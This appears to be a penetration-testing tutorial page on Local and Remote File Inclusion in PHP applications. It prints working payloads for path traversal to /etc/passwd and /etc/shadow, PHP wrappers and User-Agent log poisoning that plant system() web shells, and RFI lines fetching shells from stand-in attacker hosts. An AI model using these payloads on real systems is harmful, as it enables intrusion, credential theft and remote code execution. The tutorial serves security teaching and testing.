Home > Website Pentesting

LFI & RFI

Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities occur when a web application includes files based on user-controlled input. When inclusion parameters are not validated, sanitized, or restricted, attackers can read arbitrary files, execute code, or even load remote malicious scripts. LFI and RFI belong to the most critical file-based vulnerabilities because they directly interact with the server’s filesystem and interpreter.

How File Inclusion Works

Many applications use dynamic file loading:

include($_GET['page']);

If the user controls page, they may load:

  • internal system files

  • application source code

  • sensitive configuration files

  • remote malicious scripts (RFI)

  • uploaded files (leading to RCE)

Bad design enables attackers to break out of intended directories.

Local File Inclusion (LFI)

LFI allows attackers to load files from the server’s filesystem.

Example vulnerable URL:

page=home.php

Backend:

include("pages/" . $_GET['page']);

Attacker supplies:

page=../../../../etc/passwd

Server loads:

/etc/passwd

This exposes system-level data.

Common LFI Payloads

Basic Traversal Payloads

../
../../
../../../etc/passwd

Encoded Traversal

..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd

Null Byte Injection (older PHP versions)

../../../../etc/passwd%00

Truncates the extension.

Wrappers (PHP-specific)

php://filter – view PHP source code

php://filter/convert.base64-encode/resource=index.php

Decoding reveals full source code.

php://input – execute raw POST body

page=php://input

POST payload:

<?php system($_GET['cmd']); ?>

data:// RCE payload

data://text/plain,<?php system($_GET['cmd']); ?>

Practical LFI Testing Workflow

Step 1: Identify inclusion parameters

Look for:

page=
file=
template=
view=
action=
module=
dir=

Test with traversal sequences:

?page=../../../../etc/passwd

If readable output appears → LFI.

Step 2: Test for extension bypasses

If .php is forced:

?page=../../../../etc/passwd%00
?page=../../../../etc/passwd/.
?page=php://filter/convert.base64-encode/resource=config

Step 3: Extract sensitive system files

Linux

/etc/passwd
/etc/shadow
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log

Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts

Application files:

wp-config.php
config.php
.env
settings.py

These contain database passwords, API keys, and secrets.

Step 4: Use LFI to Achieve RCE

LFI becomes deadly when combined with:

1. File Upload

  1. Upload shell.php into /uploads/.

  2. Include it via LFI:

?page=../../uploads/shell.php

This executes the shell → RCE.

2. Log Poisoning (Apache/Nginx)

Inject PHP code into logs:

Send request:

User-Agent: <?php system($_GET['cmd']); ?>

Include log file:

?page=/var/log/apache2/access.log

Now execute:

?page=/var/log/apache2/access.log&cmd=id

3. /proc/self/environ RCE

Inject malicious User-Agent header:

User-Agent: <?php system($_GET['cmd']); ?>

Then include:

page=/proc/self/environ

If PHP execution occurs → RCE.

Remote File Inclusion (RFI)

RFI occurs when the application includes external URLs.

Example vulnerable code:

include($_GET['page']);

Attacker provides:

?page=http://attacker.com/shell.txt

If allow_url_include is enabled, PHP fetches and executes the remote file.

Remote file content:

<?php system($_GET['cmd']); ?>

Visiting:

?page=http://attacker.com/shell.txt&cmd=id

executes commands on the server.

When RFI Works

RFI only works if:

  • allow_url_fopen = On

  • allow_url_include = On

  • No validation on page parameter

Older PHP systems commonly had these enabled.

Common RFI Payloads

Direct Remote Shell

?page=http://evil.com/php.txt

Remote Code Hosting From GitHub Raw

?page=https://raw.githubusercontent.com/user/shell.php

HTTP + Base64 Execution

?page=http://attacker.com/shell.txt?cmd=whoami

Using DNS Redirect Tricks

?page=http://attacker.dns/evil

If DNS is compromised → RFI becomes possible.

Practical RFI Testing Workflow

Step 1: Check Response to Remote URLs

?page=http://example.com/

If output appears → potential RFI.

Step 2: Host a Malicious File

Create shell.txt:

<?php echo shell_exec($_GET['cmd']); ?>

Serve it:

python3 -m http.server 80

Inject:

?page=http://YOUR-IP/shell.txt

Step 3: Execute Commands

?page=http://YOUR-IP/shell.txt&cmd=id

If command output loads → RFI achieved.

Chaining LFI and RFI With Other Attacks

LFI + File Upload → RCE

LFI + Log Poisoning → RCE

LFI + Session File Poisoning → RCE

RFI + Remote Shell → RCE

LFI + SSRF → reading internal services

File inclusion vulnerabilities almost always escalate into code execution.

Why LFI/RFI Happens

Root causes include:

  • concatenating user input into file paths

  • trusting URLs as file sources

  • missing directory whitelists

  • no canonical path validation

  • lack of extension enforcement

  • relying on blacklists

  • insecure default PHP configuration

Developers underestimate how easily attackers manipulate file paths.

Impact of LFI and RFI

These vulnerabilities enable:

  • reading sensitive files

  • leaking credentials

  • executing arbitrary code

  • uploading shells

  • escalating privileges

  • stealing sessions

  • harvesting internal application logic

  • complete server compromise

LFI + minimal additional flaws often results in full remote code execution. RFI alone can instantly grant full control.

Intel Dump

  • LFI loads local files through user-controlled path parameters.

  • RFI loads remote code when URL-based inclusion is allowed.

  • Attack methods include traversal, encoding, wrappers, and null-byte injection.

  • Sensitive files such as config files, logs, and credentials are easily extracted.

  • LFI can be escalated to RCE via file upload, log poisoning, and /proc exploitation.

  • RFI directly executes remote attacker-controlled scripts when PHP allows URL includes.

  • Both vulnerabilities lead to high-severity outcomes, including full system compromise.

HOME LEARN COMMUNITY DASHBOARD